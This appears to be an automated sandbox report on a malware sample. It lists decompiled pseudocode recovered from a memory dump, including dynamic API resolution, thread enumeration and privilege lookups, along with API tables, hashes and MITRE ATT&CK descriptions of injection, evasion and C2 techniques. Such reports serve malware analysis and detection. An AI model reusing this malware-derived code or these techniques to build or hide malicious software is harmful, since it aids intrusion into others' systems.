													_v28 = _t139 + _t120 - 0x30;
													_t139 =  *_t161 & 0x000000ff;
													_t161 =  &(_t161[1]);
													__eflags = _t139;
												} while (_t139 != 0);
												_t174 =  &_v28;
											}
										}
										_t141 = GetProcAddress(LoadLibraryA( &_v140), _t174);
									}
								}
							} else {
								goto L7;
							}
							goto L22;
							L7:
							_t135 = _t135 + 1;
							_t143 =  &(_v24[4]);
							_t153 =  &(_v20[1]);
						} while (_t135 <  *((intOrPtr*)(_v32 + 0x18)));
						_t141 = 0;
					}
				}
				L22:
				return _t141;
			}

0x0035d839
0x0035d83c
0x0035d83e
0x0035d840
0x0035d847
0x0035d852
0x0035d854
0x0035d85b
0x0035d860
0x0035d862
0x0035d865
0x0035d86d
0x0035d873
0x0035d873
0x0035d880
0x0035d894
0x0035d89f
0x0035d8af
0x0035d8b4
0x0035d8bb
0x0035d8be
0x0035d8c4
0x0035d8cc
0x0035d8d0
0x0035d8d2
0x0035d8d5
0x0035d8ea
0x0035d8f0
0x0035d90d
0x0035d912
0x0035d915
0x0035d919
0x0035d91b
0x0035d920
0x0035d92c
0x0035d942
0x0035d944
0x0035d949
0x0035d94c
0x0035d950
0x0035d920
0x0035d954
0x0035d95d
0x0035d962
0x0035d968
0x0035d98d
0x0035d9c4
0x0035d9d0
0x0035d9d8
0x0035d9db
0x0035d9e0
0x0035d9e5
0x0035d9e7
0x0035d9ea
0x0035d9ec
0x0035d9f2
0x0035d9fc
0x0035d9fe
0x0035da06
0x0035da0e
0x0035da11
0x0035da16
0x0035da19
0x0035da1c
0x0035da1e
0x0035da20
0x0035da22
0x0035da24
0x0035da24
0x0035da2c
0x0035da30
0x0035da30
0x0035da45
0x0035da51
0x0035da56
0x0035da5b
0x0035da61
0x0035da65
0x0035da68
0x0035da68
0x0035da30
0x0035da83
0x0035da88
0x0035da9a
0x0035daaa
0x0035dab1
0x0035dabe
0x0035dac8
0x0035dad7
0x0035dae5
0x0035daec
0x0035daf3
0x0035daf6
0x0035db05
0x0035db0c
0x0035db11
0x0035db14
0x0035db16
0x0035db54
0x0035db18
0x0035db1e
0x0035db21
0x0035db23
0x0035db59
0x0035db25
0x0035db25
0x0035db30
0x0035db35
0x0035db3a
0x0035db44
0x0035db47
0x0035db4a
0x0035db4b
0x0035db4b
0x0035db4f
0x0035db4f
0x0035db23
0x0035db70
0x0035db70
0x0035d9fe
0x00000000
0x00000000
0x00000000
0x00000000
0x0035d96a
0x0035d973
0x0035d974
0x0035d977
0x0035d97a
0x0035d983
0x0035d983
0x0035d86d
0x0035db72
0x0035db7b

APIs

LoadLibraryA.KERNEL32(?), ref: 0035DB62
GetProcAddress.KERNEL32(00000000,?), ref: 0035DB6A

Strings

d, xrefs: 0035DAB1
l, xrefs: 0035DAC8

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: AddressLibraryLoadProc
String ID: d$l
API String ID: 2574300362-91452987
Opcode ID: 5da22266a8895559f0201c2b805a7151a12ab8e3dda7c18774dd0d9ba60a9abf
Instruction ID: 306f95196e9e61213f48dcbd3cdab04a9edc8edf5988eefca48bb75bcb30c65a
Opcode Fuzzy Hash: 5da22266a8895559f0201c2b805a7151a12ab8e3dda7c18774dd0d9ba60a9abf
Instruction Fuzzy Hash: 829118B6D001159BDF119FB4EC42FBE7BB4AF15359F450064EC49BB362E6319A0C87A2

Uniqueness

Uniqueness Score: -1.00%

Function 003546E0, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E003546E0(void* __eax, struct _LUID* _a4, struct HDC__* _a8, long _a12) {
				signed int _v20;
				signed int _t33;
				int _t34;
				signed int _t45;
				struct tagRECT* _t46;
				signed char _t47;
				signed int _t48;
				WCHAR* _t49;
				struct HWND__* _t50;
				signed char _t51;
				signed char _t55;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t62;
				struct _LUID* _t63;
				signed int _t64;
				signed int _t71;
				int _t73;
				signed int _t75;
				signed int _t81;
				signed int _t82;
				struct HDC__* _t83;
				signed int _t84;

				_t73 = _a12;
				_t83 = _a8;
				_t45 = _t83 * 0x59;
				_t46 = _t45 ^ 0x000000fa;
				_t47 = _t46 & (_t45 ^ 0x00000023);
				OffsetRect(_t46, _t73, _t73);
				_t55 = _t47 + 0xbd;
				_t57 = (_t55 ^ _t47) + _t47;
				_t48 = _t55;
				_v20 = _t57;
				_t58 = _t57;
				_t75 = (_t58 + _t83) * _t48;
				if(_t83 != _t73 || _t58 >= _a8) {
					_t84 = _t75;
					_t49 = _t48 + _t84;
					_t83 = _t84 + _t49;
					LookupPrivilegeValueW(_t49, _t83, _a4);
					_t59 = _t83 + _t49;
					_t75 = _t59 | _t49;
					_t33 = _t49;
					_t48 = _t83;
					if(_a4 == 0xd9f29025) {
						goto L3;
					}
				} else {
					_t59 = _v20;
					if(_a4 != 0xd9f29025) {
						L7:
						_v20 = _t59;
						if(_t59 != _a12) {
							L11:
							_t34 = _a4;
							_t50 = _t48 + _t34;
							EndDialog(_t50, _t34);
							_t81 = ((_t75 ^ _t50) << 0x10) + 0x3080000 >> 0x10;
							_t62 = _t81 * _t50;
							_t83 = (_t83 * _t62 << 0x10) + 0x2520000 >> 0x10;
							_t33 = _t50;
							_t48 = _t81;
							L12:
							if(_a8 == _a12) {
								_t82 = _t62;
								_t63 = _a4;
								if(_t63 != _a8 && _t33 != _t63) {
									SetTextColor(_t83, _a12);
									_t48 = _t82 & (_t83 - _a8 ^ _t48 ^ 0x000003be | 0x00001000);
								}
							}
							return _t48;
						}
						_t64 = _t75;
						if(_t64 != _a12 || _t64 == _a4) {
							goto L11;
						} else {
							_t62 = _v20;
							goto L12;
						}
					}
					L3:
					if(_a8 != 0xd9f29025) {
						_t71 = _t59;
						if(_t71 == _a8) {
							_t59 = _t71;
						} else {
							_t33 = (_t75 << 0x10) + 0x1c0000 >> 0x10;
							_t51 = _t48 + _t33;
							_t83 = (_t51 << 0x18) + 0x6b000000 >> 0x18;
							_t59 = _t51 * _t83;
							_t48 = _t59 * 0x6c000000 >> 0x18;
						}
					}
				}
			}

0x003546e7
0x003546ea
0x003546ed
0x003546f4
0x003546fa
0x003546ff
0x00354709
0x00354711
0x00354713
0x00354715
0x00354718
0x00354720
0x00354725
0x00354781
0x00354784
0x00354786
0x00354791
0x0035479a
0x0035479f
0x003547a1
0x003547a3
0x003547ab
0x00000000
0x00000000
0x0035472c
0x00354731
0x0035473a
0x003547ad
0x003547ad
0x003547b6
0x003547ca
0x003547ca
0x003547cd
0x003547d1
0x003547e2
0x003547e7
0x003547f9
0x003547fc
0x003547fe
0x00354800
0x00354806
0x00354808
0x0035480a
0x00354810
0x0035481d
0x00354838
0x00354838
0x00354810
0x00354844
0x00354844
0x003547b8
0x003547be
0x00000000
0x003547c5
0x003547c5
0x00000000
0x003547c5
0x003547be
0x0035473c
0x00354743
0x00354745
0x0035474d
0x00354845
0x00354753
0x0035475d
0x00354760
0x0035476d
0x00354773
0x0035477c
0x0035477c
0x0035474d
0x00354743

APIs

OffsetRect.USER32(?,-040D1D33,-040D1D33), ref: 003546FF
LookupPrivilegeValueW.ADVAPI32(00000000,-00371D33,?), ref: 00354791
EndDialog.USER32(-00371D33,?), ref: 003547D1
SetTextColor.GDI32(-02891D33,-040D1D33), ref: 0035481D

Strings

KAw, xrefs: 003547D1

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: ColorDialogLookupOffsetPrivilegeRectTextValue
String ID: KAw
API String ID: 2289036324-3669657816
Opcode ID: 0fe8cbeebd22d93013bee87ffc8515a3e4f8ad800832faa9e3a3108dc0fe64b8
Instruction ID: 2cb511f21f3580841079a9e2ec85cecd99e9bd6cdc3ae375e208d385ba1bb35e
Opcode Fuzzy Hash: 0fe8cbeebd22d93013bee87ffc8515a3e4f8ad800832faa9e3a3108dc0fe64b8
Instruction Fuzzy Hash: 3A411833B0052497DB1DCE59CCE09BF77AAEB99366B178129EC199B750C230AD8987C0

Uniqueness

Uniqueness Score: -1.00%

Function 003669A0, Relevance: 7.6, APIs: 5, Instructions: 65
threadprocessCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E003669A0(void* __eflags) {
				intOrPtr _v32;
				signed int _v36;
				void* _v44;
				signed char _t13;
				signed int _t16;
				signed int _t19;
				long _t23;
				void* _t24;
				void* _t25;
				void* _t27;

				_t24 = CreateToolhelp32Snapshot(4, 0);
				_v44 = E00359D50(0x647400b0);
				_t23 = GetCurrentProcessId();
				_t13 = E003555C0(Thread32First(_t24,  &_v44), 0);
				_t27 = _t25 + 0xc;
				if((_t13 & 0x00000001) != 0) {
					L6:
					_t19 = 0;
				} else {
					0;
					0;
					while(GetLastError() != 0x12) {
						_t16 = E003555C0(_v32, _t23);
						_t27 = _t27 + 8;
						_t19 =  ~(_t16 & 0x00000001) & _v36;
						if(Thread32Next(_t24,  &_v44) != 0) {
							if(_t19 == 0) {
								continue;
							} else {
							}
						}
						goto L7;
					}
					goto L6;
				}
				L7:
				return _t19;
			}

0x003669b2
0x003669c1
0x003669ca
0x003669d9
0x003669de
0x003669e3
0x00366a25
0x00366a25
0x003669eb
0x003669eb
0x003669ef
0x003669f0
0x003669ff
0x00366a04
0x00366a11
0x00366a1d
0x00366a21
0x00000000
0x00000000
0x00366a23
0x00366a21
0x00000000
0x00366a1d
0x00000000
0x003669f0
0x00366a27
0x00366a30

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 003669AD
GetCurrentProcessId.KERNEL32 ref: 003669C4
Thread32First.KERNEL32 ref: 003669D1
GetLastError.KERNEL32(00000000,?), ref: 003669F0
Thread32Next.KERNEL32 ref: 00366A16

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: Thread32$CreateCurrentErrorFirstLastNextProcessSnapshotToolhelp32
String ID:
API String ID: 1709709923-0
Opcode ID: 827200d1abfecb67d71c84888b72b90dcbb897040d22e1cbf55eef9b0ea5b6fb
Instruction ID: fdd408c044bcebcbd7a66152b6415529318cc7cabb978f021778c4433d3f4bfb
Opcode Fuzzy Hash: 827200d1abfecb67d71c84888b72b90dcbb897040d22e1cbf55eef9b0ea5b6fb
Instruction Fuzzy Hash: 2701D4B29402045BDB1266E4EC87FEF3E6CAB42355F488131FD06A9126F915A91881B5

Uniqueness

Uniqueness Score: -1.00%

Function 00352340, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00352340(char _a4) {
				signed int _v20;
				struct HDC__* _v24;
				signed int _v28;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				struct HWND__* _t32;
				int _t34;
				struct HWND__* _t35;
				signed int _t36;
				signed int _t39;
				int _t42;
				signed int _t48;
				signed int _t49;
				signed int _t54;
				void* _t56;
				signed int _t58;
				int _t59;

				_t1 =  &_a4; // 0x352f73
				_t56 =  *_t1;
				_t34 = _t56 & 0x00000100;
				RegEnumValueW(_t56, _t34, _t34, _t56 & 0xfffffeff, _t34, _t56 & 0xfffffeff, _t56, _t34);
				_t35 = _t34 * _t56;
				_t39 = 0;
				if(_t35 != _t56) {
					_t36 = _t35 | _t56;
					_t32 = _t36 * _t56;
					_t39 = _t36 * _t32 | _t32;
					_t35 = _t32;
				}
				_t54 = _t39 ^ _t56;
				DestroyWindow(_t35);
				_t58 = _t39 * _t54;
				_v20 = _t58;
				_t3 =  &_a4; // 0x352f73
				_t59 =  *_t3;
				_t42 = _t58 - _t59;
				if(_t59 == 0xaec9ea02 && _t35 != 0xaec9ea02) {
					_t48 = _t42 * _t35;
					_t5 = _t54 - 0x513615fe; // -1362499070
					_t49 = _t48 + _t5;
					_t42 = _t48 + 0xaec9ea02;
					_v24 = _t49;
					_t28 = _t54 * _t49;
					_v28 = _t28;
					_t29 = _t28 + 0xc9;
					_t30 = _t29 * _t35;
					_t35 = _t29 * _t35 >> 0x20;
					_v20 = _t30;
				}
				if(_t35 >= _t59 && _t42 != _t59) {
					MoveToEx(_v24, _t59, _t42, _t59);
					return ((_v28 ^ (_t35 + _v20 & 0x000000ff) * 0xffffffe3) << 0x18) + 0x2a000000 >> 0x18;
				}
				return 0;
			}

0x00352349
0x00352349
0x0035234e
0x00352363
0x00352369
0x0035236c
0x00352370
0x00352372
0x00352376
0x0035237e
0x00352381
0x00352381
0x00352385
0x0035238a
0x00352390
0x00352393
0x00352398
0x00352398
0x0035239e
0x003523a6
0x003523b2
0x003523b5
0x003523b5
0x003523bc
0x003523c2
0x003523c5
0x003523c8
0x003523d0
0x003523d2
0x003523d4
0x003523d6
0x003523d6
0x003523e2
0x003523ee
0x00000000
0x00352410
0x00352419

APIs

RegEnumValueW.ADVAPI32(s/5,s/5,s/5,s/5,s/5,s/5,s/5,s/5,?,00352F73,?,?,?,?,?,0035AE51), ref: 00352363
DestroyWindow.USER32(s/5,?,00352F73,?,?,?,?,?,0035AE51), ref: 0035238A
MoveToEx.GDI32(00000000,s/5,00000000,s/5), ref: 003523EE

Strings

s/5, xrefs: 00352349, 00352398, 0035235B, 0035235C, 0035235D, 0035235E, 0035235F, 00352360, 00352361, 00352362, 00352387, 003523E8, 003523EA

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: DestroyEnumMoveValueWindow
String ID: s/5
API String ID: 1329181790-3982095189
Opcode ID: a7255d6ccbd754f8a442e9f071aa14833e774402ae1b0921ecabd348c0ce2f2a
Instruction ID: f342e68dd3349c2746c5152f43387654e1572a217ce1f3fd6949876b8add3133
Opcode Fuzzy Hash: a7255d6ccbd754f8a442e9f071aa14833e774402ae1b0921ecabd348c0ce2f2a
Instruction Fuzzy Hash: 44213B717002395F8B1D8AA98CD69BFBEDDEB89761B05013BF806DB2A1E5B44D4583E0

Uniqueness

Uniqueness Score: -1.00%

Function 003529D0, Relevance: 6.1, APIs: 4, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E003529D0(void* __eax, struct HWND__* _a4) {
				int _v20;
				signed int _t14;
				struct HDC__* _t21;
				signed int _t26;
				signed int _t28;
				long _t29;
				void* _t32;
				struct HWND__* _t33;
				signed int _t37;
				signed int _t38;
				struct HDC__* _t40;
				struct HWND__* _t42;
				signed int _t43;
				void* _t44;
				void** _t46;

				_t33 = _a4;
				_t26 = _t33 + (_t33 & 0x00000004);
				_t40 = _t26 * 0x6e;
				DeleteDC(_t40);
				_t14 = _t33 * _t40 * _t26;
				_t42 = _t40 + _t14 ^ 0x00000191;
				if(_t33 == 0x191 || _t42 != _t33) {
					_t2 = (0x00000191 - _t42 & _t33) + 0x383; // 0x514
					SetWindowPos(_t42, _t33, 0x191, _t33, _t33, _t33, 0x191);
					_t14 = (_t2 | 0x00000383) * 0x383;
				}
				_v20 = _t14;
				_t43 = _t42 * _t14;
				_t4 = _t43 + 0x368; // -3594699
				_t28 = _t4 - _t14;
				_t37 = _t28 ^ _t43;
				_t6 = _t43 + 0x368; // -3593827
				_t44 = _t37 + _t6;
				ResetEvent(_t44);
				_t29 = _t28 ^ _t44;
				_t38 = _t37 | _t29;
				_t32 = _t38 & _t44;
				_t7 = _t32 + 0x31; // -3594650
				_t21 = _t7 * _t44;
				_t46 = (_t21 + _t29) * _t38;
				CreateDIBSection(_t21, _t21, _v20, _t46, _t32, _t29);
				return _t46 * _t32;
			}

0x003529d7
0x003529df
0x003529e1
0x003529e5
0x003529f0
0x003529f5
0x00352a01
0x00352a17
0x00352a1f
0x00352a2b
0x00352a2b
0x00352a31
0x00352a34
0x00352a37
0x00352a3d
0x00352a41
0x00352a43
0x00352a43
0x00352a4b
0x00352a51
0x00352a53
0x00352a57
0x00352a59
0x00352a5c
0x00352a62
0x00352a6f
0x00352a81

APIs

DeleteDC.GDI32(-0036DD33), ref: 003529E5
SetWindowPos.USER32(-0036DD33,00357BEC,00000191,00357BEC,00357BEC,00357BEC,00000191,?,00357BEC,-00371FA0,-040D1D33,-00371D33,?,00359287,-00371D33), ref: 00352A1F
ResetEvent.KERNEL32(-0036D663,?,00357BEC,-00371FA0,-040D1D33,-00371D33,?,00359287,-00371D33,?,003577A1,00000001,?,-00371D33,?,00356A74), ref: 00352A4B
CreateDIBSection.GDI32(-0036D99A,-0036D99A,-0036D9CB,-0036D663,-0036D9CB,-0036D9CB), ref: 00352A6F

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: CreateDeleteEventResetSectionWindow
String ID:
API String ID: 201249963-0
Opcode ID: e5d2e5a5182d40a1e2f01363b9798dabe383f2d0b855fa6cfd7262638d8c96bb
Instruction ID: 7f98f330e40bc17ed178e50146cf9310eb371e2c22f55bc4e0ab87cb54dbbf38
Opcode Fuzzy Hash: e5d2e5a5182d40a1e2f01363b9798dabe383f2d0b855fa6cfd7262638d8c96bb
Instruction Fuzzy Hash: CD11C873B002247FD7254A5ADC89EDBBA5EE7C9710F060126FD49DB150D9716F0586E0

Uniqueness

Uniqueness Score: -1.00%

Function 0036DA20, Relevance: 6.0, APIs: 4, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0036DA20() {
				char _v28;
				void* _t4;

				_t4 = CreateEventW(0, 1, 0, E00357200(0x3705f8,  &_v28));
				if(_t4 != 0) {
					SetEvent(_t4);
					_t4 = CloseHandle(_t4);
				}
				SetLastError(0);
				return _t4;
			}

0x0036da3f
0x0036da47
0x0036da4c
0x0036da53
0x0036da53
0x0036da5b
0x0036da66

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0CD06773,?,-00371D33,?,003591EB,-00371D33,?,003577A1,00000001), ref: 0036DA3F
SetEvent.KERNEL32(00000000,?,?,0CD06773,?,-00371D33,?,003591EB,-00371D33,?,003577A1,00000001,?,-00371D33,?,00356A74), ref: 0036DA4C
CloseHandle.KERNEL32(00000000,?,?,0CD06773,?,-00371D33,?,003591EB,-00371D33,?,003577A1,00000001,?,-00371D33,?,00356A74), ref: 0036DA53
SetLastError.KERNEL32(00000000,?,?,0CD06773,?,-00371D33,?,003591EB,-00371D33,?,003577A1,00000001,?,-00371D33,?,00356A74), ref: 0036DA5B

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: Event$CloseCreateErrorHandleLast
String ID:
API String ID: 2055590504-0
Opcode ID: d25687ddc913d563646703b0b16e958be590357764c5d6c5660631b4d7ce4aad
Instruction ID: b4901916a665de07362a41450796acfe7a4f949a984f45bb187ba9f3afdc35da
Opcode Fuzzy Hash: d25687ddc913d563646703b0b16e958be590357764c5d6c5660631b4d7ce4aad
Instruction Fuzzy Hash: 4DE048B1644204E7E62637F46C0AFAA762CAB05762F450050FB0DD9091E5555494C7B6

Uniqueness

Uniqueness Score: -1.00%

Function 00351590, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00351590(struct HWND__* _a4) {
				signed int _t5;
				signed int _t13;
				int _t16;
				signed int _t24;
				signed int _t29;
				signed int _t30;
				struct HWND__* _t31;

				_t31 = _a4;
				_t16 = (_t31 * 0xda000000 >> 0x18) * _t31;
				RegOpenKeyW(_t16, _t16, _t16);
				_t5 = _t16 - _t31;
				_t24 = _t5 * _t16;
				_t30 = _t5 ^ _t24;
				if(_t16 == _t31 || _t24 == _t31) {
					L5:
					EndDialog(_t31, _t16);
					return  !_t31 & (_t16 ^ _t30) * _t30;
				}
				_t13 = _t24 * _t24 * _t30;
				_t29 = _t13 | _t31;
				_t16 = ((_t29 << 0x18) + 0xb2000000 >> 0x18) + _t29;
				if(_t24 >= _t31 || _t29 != _t31 || _t30 == _t31) {
					goto L5;
				}
				return _t13;
			}

0x00351596
0x003515a2
0x003515a8
0x003515b2
0x003515b7
0x003515bc
0x003515c0
0x003515f8
0x003515fa
0x00000000
0x0035160c
0x003515d0
0x003515d5
0x003515e5
0x003515e9
0x00000000
0x00000000
0x00351612

APIs

RegOpenKeyW.ADVAPI32 ref: 003515A8
EndDialog.USER32(00357BAC), ref: 003515FA

Strings

KAw, xrefs: 003515FA

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: DialogOpen
String ID: KAw
API String ID: 603626419-3669657816
Opcode ID: df7c5d6b9b00513946fe2003d7f3fd5205d7e46f4845c4731e03546f4f79079a
Instruction ID: 96e27e5bb7ec025c8529c16a15338f0d5a5d61c5459feecd781f1d1d9e05f161
Opcode Fuzzy Hash: df7c5d6b9b00513946fe2003d7f3fd5205d7e46f4845c4731e03546f4f79079a
Instruction Fuzzy Hash: C7017D937006341B5B2E45AC5DD5B3FD4CE87DABE374A4037F506C6230E4A4CC8502E0

Uniqueness

Uniqueness Score: -1.00%

Function 00351A00, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00351A00() {
				intOrPtr _t9;
				WCHAR* _t10;
				struct HINSTANCE__* _t15;

				_t9 =  *0x3720d8; // 0x0
				_t10 = _t9 + 0xffffffd4;
				_t15 = (_t10 | 0x00000008) * _t10;
				CreateDialogParamW(_t15, _t10, _t15, _t15, _t15);
				GetVersion();
				return (_t10 * (_t15 + (_t15 + _t15 ^ 0x00000032) | _t10) ^ 0xffffffb4) + (_t15 + (_t15 + _t15 ^ 0x00000032) | _t10);
			}

0x00351a06
0x00351a0c
0x00351a15
0x00351a1d
0x00351a39
0x00351a47

APIs

CreateDialogParamW.USER32 ref: 00351A1D
GetVersion.KERNEL32(?,00358614,0000031F,?,00356AB1,?,0035AE51), ref: 00351A39

Strings

`:Aw KAw, xrefs: 00351A1D

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: CreateDialogParamVersion
String ID: `:Aw KAw
API String ID: 1068622756-3453105948
Opcode ID: 32ce03f317589c5834116d186175b8016e26b7583c180eb51ce0c6ef93019971
Instruction ID: 6d13f3368e2efc35c37d21440aa884fc1b512b6f80370e1fbebad62bf501821b
Opcode Fuzzy Hash: 32ce03f317589c5834116d186175b8016e26b7583c180eb51ce0c6ef93019971
Instruction Fuzzy Hash: C1E0D8336135386B52208AAFACC4C97FF9CDE422BA3020237FA4CD36B0D1504C0886F4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report v1Us5AICBm

Overview

